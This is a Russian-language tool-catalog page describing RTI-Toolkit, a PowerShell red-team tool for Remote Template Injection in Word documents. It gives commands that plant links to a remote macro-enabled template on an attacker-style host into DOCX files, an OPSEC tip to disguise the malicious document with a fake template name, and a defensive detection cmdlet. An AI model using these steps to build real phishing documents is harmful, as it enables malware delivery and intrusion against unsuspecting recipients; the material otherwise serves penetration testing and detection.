Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
RTI-Toolkit — Инструментарий PowerShell для атак и защиты с использованием удаленного внедрения шаблонов. Внедряет вредоносные ссылки в документы Office Word для фишинга, с модулями идентификации для синих команд. | Kitploit
Инструменты/GitHubGitHub/nickvourd/rti-toolkit
Инструменты фишингаФишингТестирование на ПроникновениеRed Teaming
GitHubnickvourd/rti-toolkit

RTI-Toolkit

Инструментарий PowerShell для атак и защиты с использованием удаленного внедрения шаблонов. Внедряет вредоносные ссылки в документы Office Word для фишинга, с модулями идентификации для синих команд.

Репозиторий
5592 месяцев назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

RTI-Toolkit

Remote Template Injection Toolkit

Описание

RTI-Toolkit — это набор инструментов с открытым исходным кодом на PowerShell для атаки Remote Template Injection. В этот набор входит PowerShell-скрипт PS-Templator.ps1, который может использоваться как с атакующей, так и с защитной точки зрения.

В следующей таблице представлены основные модули (командлеты) PS-Templator.ps1:

КомандлетОписаниеСторона
Invoke-TemplateВнедряет ссылки на удалённые шаблоны в стандартные шаблоны Office WordАтакующая
Invoke-RegularВнедряет ссылки на удалённые шаблоны в обычные документы Office Word без шаблонаАтакующая
Invoke-IdentifyОпределяет ссылки на удалённые шаблоны в документах Office Word (с шаблоном или без)Защитная

⚠️ PS-Templator.ps1 поддерживает только файлы DOCX.

ℹ️ Этот инструмент упоминается Национальным институтом стандартов и технологий (NIST) в Национальной базе данных уязвимостей (NVD) в записях CVE-2025-65318 и CVE-2025-65319.

Версия

1.0.0

Лицензия

Этот инструмент распространяется по лицензии License: MIT.

Благодарности

Особая благодарность моим друзьям @Papadope9 и Stavros Gkounis (a.k.a purpl3ph03n1x), которые оказали неоценимую помощь в ходе бета-тестирования инструмента.

Этот инструмент был вдохновлён во время оценки Red Teaming iCAST с @S1ckB0y1337 несколько лет назад.

Supernova создана с ❤️ @nickvourd.

Содержание

  • RTI-Toolkit
    • Описание
    • Версия
    • Лицензия
    • Благодарности
    • Содержание
    • Remote Template Injection (RTI)
    • Установка
    • Командлеты
      • Invoke-Template
        • Пример Invoke-Template
      • Invoke-Regular
        • Пример Invoke-Regular
        • Пример Invoke-Regular 2
      • Invoke-Identify
        • Пример Invoke-Identify
        • Пример Invoke-Identify 2
    • Ссылки

Remote Template Injection (RTI)

Remote Template Injection (RTI) в контексте Microsoft Office — это особый тип уязвимости безопасности, который может быть использован через вредоносные шаблоны в документах Office (например, Word, Excel, PowerPoint).

Например, в файле DOCX содержимое хранится в формате XML внутри архива, и некоторые из этих XML-файлов могут ссылаться на внешние ресурсы или шаблоны. Злоумышленники действительно могут манипулировать этими XML-файлами, чтобы вставить вредоносные ссылки или контент, способные использовать уязвимости или обманывать пользователей.

Это атака на основе макросов.

Установка

Чтобы загрузить PS-Templator.ps1 в память как модуль, выполните следующую команду:

root@kitploit:~
Import-Module .\PS-Templator.ps1

ℹ️ PS-Templator.ps1 работает без необходимости установки дополнительных зависимостей.

ℹ️ PS-Templator.ps1 работает как модуль PowerShell.

ℹ️ PS-Templator.ps1 протестирован на машине с Windows 10 и Office 2019 Professional plus.

Командлеты

Invoke-Template

Invoke-Template — это командлет, который внедряет ссылки на удалённые шаблоны в стандартные шаблоны Office Word.

Пример Invoke-Template

Предположим, у вас есть стандартный шаблон Word, например такой:

All Words Templates

Сохранённый как, например, 'Name.docx':

Default Word Template Document

Если вы используете командлет Invoke-Template, вы можете вставить вредоносную ссылку в этот docx:

⚠️ Перед запуском Invoke-Template убедитесь, что вы сохранили документ и закрыли его (завершили его процесс).

root@kitploit:~
Invoke-Template -InputDoc Name.docx -Link "https://192.168.1.3:8080/Doc1.docm" -Output C:\Users\User\Desktop\LegitDocument.docx

Результат:

Invoke-Template-1

Как видите, модуль Invoke-Template сохраняет резервную копию исходного документа и предоставляет полный путь к вредоносному документу.

С точки зрения отладки, если преобразовать вредоносный docx в zip-архив и перейти в /word/_rels/settings.xml.rels, вы увидите вредоносную ссылку:

Invoke-Template-Debug

Invoke-Regular

Invoke-Regular — это командлет, который внедряет ссылки на удалённые шаблоны в обычные документы Office Word без шаблонов.

Пример Invoke-Regular

Предположим, у вас есть обычный документ Word без шаблона, например такой:

Blank Document

Сохранённый как, например, 'Doc1.docx':

Word Document

Если вы используете командлет Invoke-Regular, вы можете вставить вредоносную ссылку в этот docx:

⚠️ Перед запуском Invoke-Regular убедитесь, что вы сохранили документ и закрыли его (завершили его процесс).

root@kitploit:~
Invoke-Regular -InputDoc C:\Users\User\Desktop\Doc1.docx -Link "http://192.168.1.3:8080/Doc1.docm" -Output Nikos2.docx

Результат:

Invoke-Regular-1

Как видите, модуль Invoke-Regular сохраняет резервную копию исходного документа и предоставляет полный путь к вредоносному документу.

С точки зрения отладки, если преобразовать вредоносный docx в zip-архив и перейти в /word/_rels/settings.xml.rels, вы увидите вредоносную ссылку:

Invoke-Regular-Debug-1

Пример Invoke-Regular 2

С точки зрения OPSEC вы можете использовать параметр -TemplateName вместе с модулем Invoke-Regular. Это сделает ваш вредоносный документ более легитимным, если кто-то попытается его проанализировать.

Вот пример:

root@kitploit:~
Invoke-Regular -InputDoc C:\Users\User\Desktop\Doc1.docx -Link "http://192.168.1.3:8080/Doc1.docm" -Output Legittemplate.dotx

Результат:

Invoke-Regular-Example-2

С точки зрения отладки, если преобразовать вредоносный docx в zip-архив и перейти в /docProps/app.xml, вы увидите поддельное имя шаблона:

Invoke-Regular-Fake-Template-Name

Invoke-Identify

Invoke-Identify — это командлет, который определяет ссылки на удалённые шаблоны в документах Office Word (с шаблоном или без).

Пример Invoke-Identify

Предположим, у вас есть вредоносный документ Word:

root@kitploit:~
Invoke-Identify -InputDoc LegitDocument.docx -Output C:\Users\User\Desktop\output.txt

Результат:

Invoke-Identify Malicous Example

Пример Invoke-Identify 2

Предположим, у вас есть невредоносный документ Word:

root@kitploit:~
Invoke-Identify -InputDoc Name.docx -Output C:\Users\User\Desktop\output2.txt

Результат:

Invoke-Identify Clean Example

Ссылки

  • ired.team
  • dmcxblue.gitbook.io
  • john-woodman.com
  • remoteInjector GitHub by John Woodman
  • Invoke-Templator GitHub by Outflanknl
  • attack.mitre.org
  • BadAssMacros GitHub by Inf0secRabbit
Скачать инструмент